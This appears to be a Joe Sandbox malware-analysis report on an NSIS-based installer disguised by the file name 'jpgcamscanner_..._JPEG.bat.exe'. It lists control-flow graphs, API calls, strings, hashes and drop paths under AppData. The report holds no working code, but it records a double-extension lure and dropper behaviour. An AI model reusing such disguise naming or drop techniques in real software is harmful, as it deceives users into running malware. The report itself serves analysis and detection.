                                  control_flow_graph 290 403798-4037b0 call 406302 293 4037b2-4037c2 call 405ec8 290->293 294 4037c4-4037f5 call 405e51 290->294 301 403818-403841 call 403a5d call 4059f0 293->301 299 4037f7-403808 call 405e51 294->299 300 40380d-403813 lstrcatA 294->300 299->300 300->301 308 403847-40384c 301->308 309 4038c8-4038d0 call 4059f0 301->309 308->309 310 40384e-403872 call 405e51 308->310 315 4038d2-4038d9 call 405f8c 309->315 316 4038de-403903 LoadImageA 309->316 310->309 317 403874-403876 310->317 315->316 319 403984-40398c call 40140b 316->319 320 403905-403935 RegisterClassA 316->320 322 403887-403893 lstrlenA 317->322 323 403878-403885 call 40592d 317->323 332 403996-4039a1 call 403a5d 319->332 333 40398e-403991 319->333 324 403a53 320->324 325 40393b-40397f SystemParametersInfoA CreateWindowExA 320->325 329 403895-4038a3 lstrcmpiA 322->329 330 4038bb-4038c3 call 405902 call 405f6a 322->330 323->322 328 403a55-403a5c 324->328 325->319 329->330 331 4038a5-4038af GetFileAttributesA 329->331 330->309 336 4038b1-4038b3 331->336 337 4038b5-4038b6 call 405949 331->337 343 4039a7-4039c1 ShowWindow call 406294 332->343 344 403a2a-403a2b call 405163 332->344 333->328 336->330 336->337 337->330 351 4039c3-4039c8 call 406294 343->351 352 4039cd-4039df GetClassInfoA 343->352 347 403a30-403a32 344->347 349 403a34-403a3a 347->349 350 403a4c-403a4e call 40140b 347->350 349->333 353 403a40-403a47 call 40140b 349->353 350->324 351->352 356 4039e1-4039f1 GetClassInfoA RegisterClassA 352->356 357 4039f7-403a1a DialogBoxParamA call 40140b 352->357 353->333 356->357 360 403a1f-403a28 call 4036e8 357->360 360->328
                                  APIs
                                    • Part of subcall function 00406302: GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
                                    • Part of subcall function 00406302: GetProcAddress.KERNEL32(00000000,?), ref: 0040632F
                                  • lstrcatA.KERNEL32(1033,spidskaalshoved Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,spidskaalshoved Setup: Installing,00000000,00000002,75953410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",00000000), ref: 00403813
                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244,1033,spidskaalshoved Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,spidskaalshoved Setup: Installing,00000000,00000002,75953410), ref: 00403888
                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 0040389B
                                  • GetFileAttributesA.KERNEL32(Call), ref: 004038A6
                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244), ref: 004038EF
                                    • Part of subcall function 00405EC8: wsprintfA.USER32 ref: 00405ED5
                                  • RegisterClassA.USER32(00422EA0), ref: 0040392C
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403944
                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403979
                                  • ShowWindow.USER32(00000005,00000000), ref: 004039AF
                                  • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039DB
                                  • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039E8
                                  • RegisterClassA.USER32(00422EA0), ref: 004039F1
                                  • DialogBoxParamA.USER32(?,00000000,00403B35,00000000), ref: 00403A10
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$spidskaalshoved Setup: Installing
                                  • API String ID: 1975747703-3413598102
                                  • Opcode ID: fdd1c6f164d69bb04a2db118324e420eee4596cf25755c9c8f65584aa60a0941
                                  • Instruction ID: 22145a8d87807f1e884b2dd2f98424a05527e1b570cf61420d2a276d1199ab18
                                  • Opcode Fuzzy Hash: fdd1c6f164d69bb04a2db118324e420eee4596cf25755c9c8f65584aa60a0941
                                  • Instruction Fuzzy Hash: 3B61D5B1744200BED720BF659D45F2B3AACEB4475AB40447EF941B22E2C67C9D069A2E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 364 402d63-402db1 GetTickCount GetModuleFileNameA call 405b03 367 402db3-402db8 364->367 368 402dbd-402deb call 405f6a call 405949 call 405f6a GetFileSize 364->368 369 402f95-402f99 367->369 376 402df1 368->376 377 402ed8-402ee6 call 402cff 368->377 379 402df6-402e0d 376->379 384 402ee8-402eeb 377->384 385 402f3b-402f40 377->385 380 402e11-402e1a call 403178 379->380 381 402e0f 379->381 390 402e20-402e27 380->390 391 402f42-402f4a call 402cff 380->391 381->380 387 402eed-402f05 call 40318e call 403178 384->387 388 402f0f-402f39 GlobalAlloc call 40318e call 402f9c 384->388 385->369 387->385 410 402f07-402f0d 387->410 388->385 415 402f4c-402f5d 388->415 394 402ea3-402ea7 390->394 395 402e29-402e3d call 405abe 390->395 391->385 399 402eb1-402eb7 394->399 400 402ea9-402eb0 call 402cff 394->400 395->399 413 402e3f-402e46 395->413 406 402ec6-402ed0 399->406 407 402eb9-402ec3 call 4063b9 399->407 400->399 406->379 414 402ed6 406->414 407->406 410->385 410->388 413->399 417 402e48-402e4f 413->417 414->377 418 402f65-402f6a 415->418 419 402f5f 415->419 417->399 421 402e51-402e58 417->421 420 402f6b-402f71 418->420 419->418 420->420 422 402f73-402f8e SetFilePointer call 405abe 420->422 421->399 423 402e5a-402e61 421->423 426 402f93 422->426 423->399 425 402e63-402e83 423->425 425->385 427 402e89-402e8d 425->427 426->369 428 402e95-402e9d 427->428 429 402e8f-402e93 427->429 428->399 430 402e9f-402ea1 428->430 429->414 429->428 430->399
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402D74
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,00000400), ref: 00402D90
                                    • Part of subcall function 00405B03: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,80000000,00000003), ref: 00405B07
                                    • Part of subcall function 00405B03: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29
                                  • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,80000000,00000003), ref: 00402DDC
                                  Strings
                                  • "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe", xrefs: 00402D63
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D6A
                                  • C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe, xrefs: 00402D7A, 00402D89, 00402D9D, 00402DBD
                                  • Null, xrefs: 00402E5A
                                  • Inst, xrefs: 00402E48
                                  • soft, xrefs: 00402E51
                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
                                  • C:\Users\user\Desktop, xrefs: 00402DBE, 00402DC3, 00402DC9
                                  • Error launching installer, xrefs: 00402DB3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                  • String ID: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                  • API String ID: 4283519449-2131262596
                                  • Opcode ID: 4402c1a628421308b32cd0359e52fb618b8350017d4aa0aaea4d42cf6b84a165
                                  • Instruction ID: 2e32d7aad0b4ca297083aa7498b96cb894cc3d31802a5233eda7db803f364c93
                                  • Opcode Fuzzy Hash: 4402c1a628421308b32cd0359e52fb618b8350017d4aa0aaea4d42cf6b84a165
                                  • Instruction Fuzzy Hash: CB51D6B1900215ABDB219F65DE89B9F7AB8EB04365F10403BF904B62D1C7BC9E418B9D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 431 405f8c-405f97 432 405f99-405fa8 431->432 433 405faa-405fc0 431->433 432->433 434 4061b1-4061b5 433->434 435 405fc6-405fd1 433->435 437 405fe3-405fed 434->437 438 4061bb-4061c5 434->438 435->434 436 405fd7-405fde 435->436 436->434 437->438 439 405ff3-405ffa 437->439 440 4061d0-4061d1 438->440 441 4061c7-4061cb call 405f6a 438->441 442 406000-406034 439->442 443 4061a4 439->443 441->440 445 406151-406154 442->445 446 40603a-406044 442->446 447 4061a6-4061ac 443->447 448 4061ae-4061b0 443->448 451 406184-406187 445->451 452 406156-406159 445->452 449 406046-40604a 446->449 450 40605e 446->450 447->434 448->434 449->450 455 40604c-406050 449->455 458 406065-40606c 450->458 453 406195-4061a2 lstrlenA 451->453 454 406189-406190 call 405f8c 451->454 456 406169-406175 call 405f6a 452->456 457 40615b-406167 call 405ec8 452->457 453->434 454->453 455->450 460 406052-406056 455->460 467 40617a-406180 456->467 457->467 462 406071-406073 458->462 463 40606e-406070 458->463 460->450 468 406058-40605c 460->468 465 406075-406098 call 405e51 462->465 466 4060ac-4060af 462->466 463->462 479 406138-40613c 465->479 480 40609e-4060a7 call 405f8c 465->480 472 4060b1-4060bd GetSystemDirectoryA 466->472 473 4060bf-4060c2 466->473 467->453 471 406182 467->471 468->458 475 406149-40614f call 4061d4 471->475 476 406133-406136 472->476 477 4060c4-4060d2 GetWindowsDirectoryA 473->477 478 40612f-406131 473->478 475->453 476->475 476->479 477->478 478->476 481 4060d4-4060de 478->481 479->475 484 40613e-406144 lstrcatA 479->484 480->476 486 4060e0-4060e3 481->486 487 4060f8-40610e SHGetSpecialFolderLocation 481->487 484->475 486->487 491 4060e5-4060ec 486->491 488 406110-40612a SHGetPathFromIDListA CoTaskMemFree 487->488 489 40612c 487->489 488->476 488->489 489->478 492 4060f4-4060f6 491->492 492->476 492->487
                                  APIs
                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004060B7
                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,004050C9,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000), ref: 004060CA
                                  • SHGetSpecialFolderLocation.SHELL32(004050C9,00000000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,004050C9,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000), ref: 00406106
                                  • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406114
                                  • CoTaskMemFree.OLE32(00000000), ref: 00406120
                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406144
                                  • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,004050C9,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,00000000,0040E8C0,00000000), ref: 00406196
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                  • API String ID: 717251189-1221309604
                                  • Opcode ID: fabf967f770454fcc69e8c0a52ac2f68008736219b33d49b2524f3e131f746b9
                                  • Instruction ID: 60a0f59e8b6b1cd7b12ffa89f816090d794fd0a29963f433d7893304f5ec962b
                                  • Opcode Fuzzy Hash: fabf967f770454fcc69e8c0a52ac2f68008736219b33d49b2524f3e131f746b9
                                  • Instruction Fuzzy Hash: 9D61F171A00111AEDF219F24CC95BBB3BA5DB45300F16813BE943BA2D2C23C49A2CB5E

                                  Control-flow Graph

                                  APIs
                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers,00000000,00000000,00000031), ref: 00401798
                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers,00000000,00000000,00000031), ref: 004017C2
                                    • Part of subcall function 00405F6A: lstrcpynA.KERNEL32(?,?,00000400,004032A8,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F77
                                    • Part of subcall function 00405091: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
                                    • Part of subcall function 00405091: lstrlenA.KERNEL32(004030CC,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
                                    • Part of subcall function 00405091: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,004030CC,004030CC,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000), ref: 004050ED
                                    • Part of subcall function 00405091: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll), ref: 004050FF
                                    • Part of subcall function 00405091: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
                                    • Part of subcall function 00405091: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
                                    • Part of subcall function 00405091: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp$C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers$Call
                                  • API String ID: 1941528284-530941355
                                  • Opcode ID: 598ecc7f31e43cc8286b2ac0d52d053a057aa8c3f9718e2fb031b9a51df1fded
                                  • Instruction ID: ccd8e90e53bd547ce555faf0a88c0b4db7f619f01c1663a473e2e99c851a8e73
                                  • Opcode Fuzzy Hash: 598ecc7f31e43cc8286b2ac0d52d053a057aa8c3f9718e2fb031b9a51df1fded
                                  • Instruction Fuzzy Hash: D841A571A04516BECF107BB5CC45DAF76A8EF45369B20823BF521F20E1C77C8A418A6D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 629 405091-4050a6 630 40515c-405160 629->630 631 4050ac-4050be 629->631 632 4050c0-4050c4 call 405f8c 631->632 633 4050c9-4050d5 lstrlenA 631->633 632->633 635 4050f2-4050f6 633->635 636 4050d7-4050e7 lstrlenA 633->636 637 405105-405109 635->637 638 4050f8-4050ff SetWindowTextA 635->638 636->630 639 4050e9-4050ed lstrcatA 636->639 640 40510b-40514d SendMessageA * 3 637->640 641 40514f-405151 637->641 638->637 639->635 640->641 641->630 642 405153-405156 641->642 642->630
                                  APIs
                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
                                  • lstrlenA.KERNEL32(004030CC,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,004030CC,004030CC,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000), ref: 004050ED
                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll), ref: 004050FF
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll
                                  • API String ID: 2531174081-2402085922
                                  • Opcode ID: aecfa0fe9eb69d515e305a3f612982ae456e6964b8eee712a8e2a2356c55715c
                                  • Instruction ID: f15a229f4800e2d3be0f1ca7c95b874ac348c5f245d1a9f1eaef2b17b8141df3
                                  • Opcode Fuzzy Hash: aecfa0fe9eb69d515e305a3f612982ae456e6964b8eee712a8e2a2356c55715c
                                  • Instruction Fuzzy Hash: 67217A71E00518BADF119FA5CD84ADFBFA9EB05354F14807AF904AA291C6789E418FA8

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 643 405557-4055a2 CreateDirectoryA 644 4055a4-4055a6 643->644 645 4055a8-4055b5 GetLastError 643->645 646 4055cf-4055d1 644->646 645->646 647 4055b7-4055cb SetFileSecurityA 645->647 647->644 648 4055cd GetLastError 647->648 648->646
                                  APIs
                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040559A
                                  • GetLastError.KERNEL32 ref: 004055AE
                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055C3
                                  • GetLastError.KERNEL32 ref: 004055CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                  • API String ID: 3449924974-2230009264
